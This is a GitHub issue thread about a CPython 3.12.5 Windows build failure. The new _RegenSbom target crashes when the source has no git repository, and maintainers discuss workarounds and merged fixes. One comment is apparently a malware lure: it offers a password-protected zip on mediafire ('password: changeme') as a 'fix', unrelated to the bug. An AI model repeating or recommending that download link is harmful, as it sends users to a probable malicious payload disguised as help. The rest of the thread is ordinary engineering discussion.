### ISSUE TITLE
python 3.12.5 new added build target _RegenSbom fails to build on windows

### ISSUE THREAD

**Issue by Ganeshkumhar1** [python/cpython#123458]
# Bug report

### Bug description:

```xml
<Target Name="Regen"
          Condition="$(Configuration) != 'PGUpdate'"
          DependsOnTargets="_TouchRegenSources;_RegenPegen;_RegenAST_H;_RegenOpcodes;_RegenTokens;_RegenKeywords;_RegenGlobalObjects;_RegenSbom">
    <Message Text="Generated sources are up to date" Importance="high" />
  </Target>
```

```pytb
FAILURE - 
      _RegenGlobalObjects:
         Regenerate Global Objects
         "C:\Temp\3499797612\python\src\Python-3.12.5\PCbuild\\..\externals\pythonx86\tools\python.exe" Tools\build\generate_global_objects.py
         # not changed: C:\Temp\3499797612\python\src\Python-3.12.5\Include\internal\pycore_global_strings.h
         # not changed: C:\Temp\3499797612\python\src\Python-3.12.5\Include\internal\pycore_runtime_init_generated.h
         # not changed: C:\Temp\3499797612\python\src\Python-3.12.5\Include\internal\pycore_unicodeobject_generated.h
         # not changed: C:\Temp\3499797612\python\src\Python-3.12.5\Include\internal\pycore_global_objects_fini_generated.h
       _RegenSbom:
         "C:\Temp\3499797612\python\src\Python-3.12.5\PCbuild\\..\externals\pythonx86\tools\python.exe" "C:\Temp\3499797612\python\src\Python-3.12.5\Tools\build\generate_sbom.py"
         fatal: not a git repository (or any of the parent directories): .git
         Traceback (most recent call last):
           File "C:\Temp\3499797612\python\src\Python-3.12.5\Tools\build\generate_sbom.py", line 349, in <module>
             main()
           File "C:\Temp\3499797612\python\src\Python-3.12.5\Tools\build\generate_sbom.py", line 344, in main
             create_source_sbom()
           File "C:\Temp\3499797612\python\src\Python-3.12.5\Tools\build\generate_sbom.py", line 245, in create_source_sbom
             paths = filter_gitignored_paths(paths)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
           File "C:\Temp\3499797612\python\src\Python-3.12.5\Tools\build\generate_sbom.py", line 124, in filter_gitignored_paths
             assert git_check_ignore_proc.returncode in (0, 1)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         AssertionError
```        
       How I am building - 
       [Python-3.12.5\PCbuild]call build.bat -e -v -p x64 --no-tkinter

I was able to build 3.12.3 successfully using this but 3.12.5 if failing with git error . I am not using git here though it is installed on my windows host. could someone Please suggest a way out here.

### CPython versions tested on:

3.12

### Operating systems tested on:

Windows

### Linked PRs
* gh-123507
* gh-123615
* gh-123616

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zooba** [comment]
@sethmlarson FYI. I doubt this is Windows-specific, unless the SBOM script isn't using Git on other platforms.

As for a workaround, I would hope that if you touch the `Misc/*.spdx.json` files so their last modified date is recent, they shouldn't try to regenerate. That ought to skip the whole thing. Or you can delete `_RegenSbom` from that section of `regen.targets` you posted.

**Comment by sethmlarson** [comment]
@zooba Yeah this isn't Windows specific, this will happen whenever you pull the source code and try to regenerate without a local `.git` repository. Let me try to see if we can get `.gitignore` filtering without needing a git repository?

**Comment by zooba** [comment]
Or skip the SBOM update?

**Comment by hugovk** [comment]
Re-opening until the backports are merged. I've approved them:

* gh-123615
* gh-123616

**Comment by hugovk** [comment]
Backports merged, thanks all.
